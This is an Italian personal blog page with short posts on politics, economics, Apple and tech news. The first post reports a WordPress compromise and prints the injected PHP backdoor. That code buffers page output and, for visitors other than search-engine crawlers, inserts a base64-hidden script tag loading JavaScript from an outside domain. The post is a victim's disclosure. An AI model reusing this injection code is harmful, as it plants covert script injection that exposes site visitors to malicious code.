Mi distraggo per qualche giorno e mi ritrovo il blog compromesso. Pochi giorni dopo l’upgrade a 3.0 ? WTF ?
Tutti i file .php dell’installazione erano stati modificati, con all’inizio del file un bel
< ?eval(base64_decode("{very_long_base64_string}") ?>
Se qualcuno si vuole divertire, la parte iniziale del codice di invocazione è:
if(function_exists(‘ob_start’)&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; if(!function_exists(‘mrobh’)){ if(!function_exists(‘gml’)){ function gml(){ if (!stristr($_SERVER["HTTP_USER_AGENT"],”googlebot”)&& (!stristr($_SERVER["HTTP_USER_AGENT"],”yahoo”))){ return base64_decode(“PHNjcmlwdCBzcmM9Imh0dHA6Ly9kb21haW5hbWVhdC5jYy9qczIucGhwIj48L3NjcmlwdD4=”); } return “”; } } if(!function_exists(‘gzdecode’)){ function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack(‘v’,substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; } if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header(‘Content-Encoding: none’); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); if(preg_match(‘/\< \/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace('/(\<\/body[^\>]*\>)/si’,gml().”\n”.’$1′,$RA179ABD3A7B9E28C369F7B59C51B81DE); }else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start(‘mrobh’); } }
Update: ripubblicato dopo aver fatto pulizia più approfondita del sito.
Pubblicato in Software
|
Contrassegnato exploit, wordpress
|
Whenever I think about the environment (Be Green; Love Mother Earth; Blah Blah Blah), I like to think of a family going out to a nice restaurant. Mom and Dad place their orders–but for some reason, the kids don’t get anything. Instead, the kids wait and watch while their parents gobble down dinner.
Their parents eat the arugula salad, the rosemary-infused bread, the sun-dried tomato farfalle, the veal piccata, and generally have a pretty great time. Maybe Mom’s wearing pearls, because, you know, it’s a nice restaurant. Dad is definitely wearing a tie–he’s classy that way. Mom and Dad go through a couple bottles of wine, linger over the tiramisu, and then, when they’re stuffed to the gills, they shove their picked-over and scraped-over plates down the table to their children, with the last bits of pasta and the runny lines of sauce, and some chewed-up bits of meat, and say, “Here kids, eat up!”
So the kids get the scraps, while their parents get the meal.
And then, to top it all off, Mom and Dad get up from the table and walk out the door, leaving the kids to deal with the pissed-off waiter who just showed up saying that the credit card has been declined. So the kids end up washing dishes in the back for the next couple hundred years to pay off the bill.
John Scalzi’s The Whatever cita Paolo Bacigalupi
Pubblicato in Digressioni
|
Parafrasando Andrew Sullivan:
“Fanno davvero impressione certi sedicenti Cristiani che difendono la ricchezza mentre Gesù pretendeva la povertà assoluta, feticizzano la famiglia mentre Gesù abbandonò la sua ed esortò i suoi seguaci a lasciare mogli, mariti e bambini, si immischiano nella politica mentre Gesù diceva chiaramente che il suo Regno non era di questo mondo, difendono le guerre di religione mentre Gesù cercava sempre e ovunque la pace e sostengono la tortura che è ciò che i Romani fecero a Gesù.”
Pubblicato in Politica, Rants
|
Contrassegnato cristianità, Politica
|
Il team di The Pirate Bay prepara un servizio chiamato IPREDator, una VPN che dovrebbe permettere agli utenti di caricare/scaricare via Bittorrent con più serenità d’animo rispetto a spioni assortiti (di stato o privati). Il servizio è in beta privata, ma dovrebbe essere reso pubblico settimana prossima, al costo di 5€ al mese.
Via | ars technica
Lapsus freudiano sentito da un mac-o-filo in ufficio: ‘quando esce slow leopard ?’
Pubblicato in General
|
Contrassegnato mac os x, snow leopard
|
Notizie interessanti lette nel weekend:
Il piccolo “errore umano” in Google che ha classificato tutto il web come potenziale malware si era ripercosso anche su Gmail: tutte le mail arrivate nei 40 minuti circa in cui le impostazioni errate erano attive sono state classificate come spam.
Google aveva promesso che avrebbe cercato di rimediare all’erronea classificazione delle mail in ingresso. E stamattina il Google Elite Troubleshooting team ha “delivered”: il mio inbox era totalmente sputtanato: ieri sera avevo 30 mail in inbox (lette ma da gestire). Stamattina ho oltre 14.700 mail in inbox di cui 7.456 da leggere. In massima parte si tratta dello spam degli ultimi 30 giorni, per il resto si tratta di mail rigurgitata dalla varie etichette in cui era stata archiviata.
Ottimo lavoro, Google! What next ? Riordinamento casuale del testo nei messaggi ?
Paul Krugman sulla mancanza di differenze semantiche tra un criminale come Bernie Madoff (egli della sparizione di 50 miliardi di dollari) e la “industria degli investimenti” in generale:
L’industria dei servizi finanziari ha intascato una frazione in continua crescita del reddito nazionale nel corso dell’ultima generazione, rendendo coloro che la gestiscono incredibilmente ricchi. Eppure, al momento, sembra che buona parte del settore abbia distrutto valore anziché crearne.
Krugman è particolarmente riguardo agli effetti corruttivi di un sistema che ricompensa l’apparenza di un profitto, senza sanzionare chi risulti, sul lungo termine, aver creato profitti illusori.
Pubblicato in Digressioni
|
Contrassegnato economia, finanza, krugman, madoff
|
Si sgretola anche l’ultima (in ordine di tempo?) chance per Alitalia. Ci sono altri conigli pronti a saltare fuori dal cilindro ?
Update: curiosamente l’offerta è stata presentata, alla fine.
via
Pubblicato in Digressioni
|
Contrassegnato alitalia
|
Se c’è un solo blog su Apple da avere nell’aggregatore, questo è Daring Fireball. La gemma di oggi:
Tutti quelli là fuori che ce l’hanno duro per per la storia del finder di Snow Leopard riscritto in Cocoa, hanno bisogno di ripigliarsi. Cocoa è solo una API. Non è una specie di tecnologia magica per cui spargi una tonnellata di parentesi quadre nel tuo codice e improvvisamente ti ritrovi una interfaccia utente migliore.
Dalla prospettiva dell’utente, il finder di Snow Leopard continuerà ad essere più o meno l’esatto stesso pezzo di cacca che abbiamo avuto fin dall’inizio in Mac OS X.
PS: ovviamente, non può mancare Melablog, a complemento.
Pubblicato in Apple
|
Contrassegnato cocoa, finder, snow leopard
|
Un uomo onesto. Un patriota. Un grande statista.
“Craxi mi mandò un amico per dirmi di stare attenti, il 14 o il 15 aprile ci sarà un raid americano contro la Libia”
Così ci informa il ministro degli esteri Libico. La ricompensa ? Missili libici su Lampedusa.
via
Pubblicato in Politica
|
Contrassegnato craxi, libia
|
Sono allibito. Sbigottito. Tutte le dichiarazioni dei redditi di tutti del 2006 di tutti gli italiani online ?!?!?Voglio davvero sapere chi è il responsabile di questo scempio della privacy. via
Pubblicato in Politica, Rants
|
Contrassegnato fisco
|
Il Vaticano incoraggia a “trovare un accordo per il bene comune“. La diaspora Democristiana di destra respinge la grave ingerenza della Chiesa nella politica italiana e, per una volta, invoca a gran voce il “Libera Chiesa in Libero Stato”: qui si tratta di poltrone!
Il senatore Barbato dell’Udeur irrompe nell’aula del Senato della Repubblica per inveire contro il collega di partito Cusumano, ritenuto voltagabbana2 perché non rispetta la consegna di voltare la gabbana, gridandogli contro “pezzo di merda”. Non contento della grande prova di contegno istituzionale, il Cusumano procede sputando in faccia al Barbato e, per buona misura, cerca pure di mettergli le mani addosso e gli fa il segno della pistola.
Non c’è che dire: un mito!
via
La FAA, autorità di controllo del traffico aereo negli Stati Uniti lancia l’allarme: il nuovo Boeing 787 Dreamliner sarebbe vulnerabile ad attacchi da parte di “hacker” poiché il network cui i passeggeri potranno accedere in volo è connesso ai sistemi di controllo dell’aereo. Argh.
Via | Alfonso Fuggetta
Pubblicato in Digressioni, Security
|
Contrassegnato boeing, dreamliner
|
L’indagine Ocse/Pisa 2006 aveva visto i quindicenni italiani piazzarsi tra gli ultimi in una graduatoria internazionale della cultura scientifica degli studenti.
Nessuno si stupirà che un campione di professori di scienze delle medie superiori e inferiori ha avuto grosse difficoltà a rispondere alle stesse domande, poste dal settimanale Panorama.
Sic transit futurus Italiae
Via | Corriere
Pubblicato in Digressioni
|
Contrassegnato italia
|
Tre dei più grossi gruppi edilizi spagnoli hanno visto le loro azioni crollare a turno negli ultimi mesi a causa dell’aumento del costo del debito e del “fermo” dei prezzi nell’edilizia, e sono stati costretti a licenziare i loro amministratori delegati (che in alcuni casi erano anche i maggiori azionisti) e ad intraprendere dolorose ristrutturazioni. Il settore edilizio, responsabile di gran parte della famosa crescita del PIL spagnolo negli ultimi anni, sta contraendosi ad un ritmo vertiginoso, con il rischio di un passaggio da 800.000 case nuove all’anno (quanto UK, Germania e Francia insieme) ad un più ragionevole 450.000 all’anno, con una perdita di 450.000 posti di lavoro e prezzi delle case in calo dopo una crescita del 280% in 9 anni.
Si attendono ora le ripercussioni a catena sulle banche creditrici dei gruppi dell’edilizia. Forse un modello di crescita non così virtuoso, tutto sommato.
Via | FT
Pubblicato in Digressioni
|
Contrassegnato spagna
|
Oh. Un bel titolo da trovare nell’aggregatore: anche Sony-BMG, la compagnia che si è inventata la più egregia delle offese ai propri clienti, con il famigerato rootkit, comincerà ad offrire musica in formato digitale libera da restrizioni artificiali DRM. Che dire ? Meglio tardissimo che mai ?
Via | Mashable
Pubblicato in DRM, Digressioni
|
Contrassegnato rootkit, sony bmg
|
Dice Silvio Berlusconi:
La maggioranza degli italiani teme di non avere più privacy: si alza il telefono, poi si ritrovano le conversazioni pubblicate sui giornali, e questo non può succedere in un Paese democratico e liberale
Non che non senta il problema dei poveri potenti di questo paese, che trovano i loro imbarazzanti e squallidi intrallazzi spalmati sulle pagine dei giornali, ma ammetto che è molto raro che mi capiti di parlare al telefono e pensare: “oh cielo, e se questa telefonata è intercettata e tra un mese me la trovo su Republlica ?!?!”
Mi sa che qualcuno ha perso di vista quali siano i problemi per “la maggioranza degli Italiani”: non coincidono con quelli della ristretta cerchia di persone con cui si condividono affari, interessi e avventure politiche.
Via | Noise from Amerika
Pubblicato in Politica
|
Contrassegnato intercettazioni
|
